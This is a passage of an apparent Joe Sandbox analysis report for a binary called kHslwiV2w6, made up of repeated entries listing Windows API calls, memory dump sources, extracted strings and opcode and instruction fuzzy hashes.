                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88126D26B0B7C682FA54AB12AC503B9A7E0FF88B84F944136D95D07795DF7CE490CB60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3888577265-0
                                                                                                                                                                                                                                                                                  • Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                                                                                                                                  • Instruction ID: e720e4ab87fc681c73bdc8e313e59e2b35661ea213e5263761f0b2aaddd86703
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10028172B0A6C286FB55AB269D503B9B7A0FF44B84F844136DA5D037A6DF3CE451CB20
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6B07
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6C51
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6D33
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6D49
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF72F5A73A0), ref: 00007FF72F5A6DBE
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                                                                  • String ID: [ KeepUnwinding ]
                                                                                                                                                                                                                                                                                  • API String ID: 2546344036-400895726
                                                                                                                                                                                                                                                                                  • Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                                                                                                                                  • Instruction ID: 13cc2dc3b3541544f078a950a8c8eab1a506a7b45feb0d35acee91d42ff0f21a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33B1813270AB8585EB90AF26D8402E973E5FB44B88F984136CE5D07399DF39E465CF20
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B657
                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B660
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?), ref: 00007FF72F60B666
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1249254920-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 4d85fabfa42be483c55bc1fb9b69dd090164f9bda100de10f29bc202a0794cc9
                                                                                                                                                                                                                                                                                  • Instruction ID: 51d2742156ae8bd444ee0dac6cebc90116c7983f36aa4eaa053be37b59d0000b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d85fabfa42be483c55bc1fb9b69dd090164f9bda100de10f29bc202a0794cc9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63D0C751F0958786F7583761EC190756217FF5CF55F445034CE0B56310DD3D54858B20
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                                                                                                                                  • Instruction ID: a6f3b7d58feeca5fcf5725cbdbda447a5b0caa1e59d0411c176d419d6bf621a3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D17232B0AAC586EB60AF16D8007B9B360FB46794F844136DA6E47784DF7CE441CF60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                                                                                                                                  • Instruction ID: ccc854cb386e4070efea201ce933e2e27bd2bc2d2bf93687177eed0083755530
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E1AF36B09AC696EB10AF5ADC442B8B7A5EB05B94FD00235D95E077A4DF3CE481CB60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2982998374-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                                                                                                                                  • Instruction ID: 1d0f88d8421987c7266805ddb6c7b388c62cf3962f2894c82dec33f46fbdd049
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F513B96B087C187EE61EA666D003F9EA95EB857C0F998131CE6D47BC2DE3CD940CB10
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF72F5A4896,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B0531
                                                                                                                                                                                                                                                                                  • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF72F5A4896,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B0590
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: EnabledFeaturesState
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1557480591-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                                                                                                                                  • Instruction ID: eea482c1d0a5ed0893bace7d0cda0611c20b543bcec7d4a44ca334cf5b1d5c09
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA512432F0C29A06FF68585BD8993B98283FFD1B50F954538C94E936C9CD7FD8424A24
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}$@=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-1422472067
                                                                                                                                                                                                                                                                                  • Opcode ID: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                                                                                                                                  • Instruction ID: eba9565eb16d7f14c7e7851c9e84c5246c1d655de7ca451e142eef5edaf61974
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D428A75B09AC287EA15AB19AC513E8B7A0FF19B54FD44136CA4E03361DF3DE062CB60
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}$d
                                                                                                                                                                                                                                                                                  • API String ID: 0-4053520297
                                                                                                                                                                                                                                                                                  • Opcode ID: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
                                                                                                                                                                                                                                                                                  • Instruction ID: 164aed5e4eb19e381f3ef8cddba71704b2f26d4adaada7beab14c9038627684f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A413C61F19B8942ED05A7779D41AB4D192DF5E3D0E98D732D81D263D5EF3C70828910
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
                                                                                                                                                                                                                                                                                  • Instruction ID: 69c7c7652f7460d964aa47d3a1a802a0ffad53e4f996a131bb25fdb76a1fbe38
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4792CF65B1AAC686FA05AB26AD506F4E3A1FF49BC4FC84137D90E53761DF3CE4418B20
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                                                                                                                                  • Instruction ID: 7f2921c6bb336a635b0905310e8dec68970fc6aa9a08736738f88797fcd214a5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5462E5B3B16B4687E7089F29C855BAD76A1FB94B89F458035CA1D43788DF3CD924CB80
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4239280443-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                                                                                                                                  • Instruction ID: b02d32c2ec47e05e413bccd92a9f32966a5a2570d32b949b2d783a840f0578d0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE42E339E19BC286F700AB25AC802A5B3A5FF5D744FD05239D98C22765DF3CA1A1DB60
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Count64Tick
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1927824332-0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                                                  • API String ID: 0-1684325040
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF72F5A4879,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B00FC
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2086374402-0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2783962273-3916222277
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72F6390F0
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
